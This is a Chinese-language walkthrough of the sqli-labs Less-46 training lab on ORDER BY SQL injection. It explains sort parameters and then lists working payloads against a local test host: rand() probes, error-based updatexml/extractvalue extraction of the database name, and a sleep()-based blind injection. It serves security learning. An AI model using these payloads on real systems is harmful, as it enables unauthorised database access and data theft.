sqli-labs(less-46)order by 注入

我们打开sql-labs的第46关然后在输入框内输入?id=1时会发现页面没有任何的变化，此时我们用Visual Studio Code查看第46关的代码

此时我们发现sql语句是sql = "SELECT \* FROM users ORDER BY id"; ，所以现在我们需要了解一下order by语句的作用。

在SQL语句中，asc是指定列按升序排列，desc则 是指定列按降序排列。
select * from users order by 1 desc; 使用降序进行排列
select * from users order by 1 asc;使用升序进行排列

这时我们就知道了，sql语句只有order by后面的参数是我们可控的，所以我们可以输入?sort=1,在这里sort=1的意思就是以第一列数据也就是id进行排序。

http://127.0.0.1/sincer/Less-46/?sort=1

http://127.0.0.1/sincer/Less-46/?sort=2

此时我们输入?sort=2，就是以USERNAME进行排序。

输入?sort=3时，会以PASSWORD进行排序。

当我们输入?sort=4时会报错，因为没有第四列。

注入点测试

127.0.0.1/sincer/less-46/?sort=rand(true)

http://127.0.0.1/sincer/less-46/?sort=rand(false)

报错注入（获取表名）

http://127.0.0.1/sincer/less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)

或者

http://127.0.0.1/sincer/less-46/?sort=(extractvalue(1,concat(0x7e,(database()),0x7e)))--+

时间盲注

http://127.0.0.1/sincer/Less-46/?sort=1%20and%20if(substr(database(),1,1)=%27s%27,1,sleep(1))--+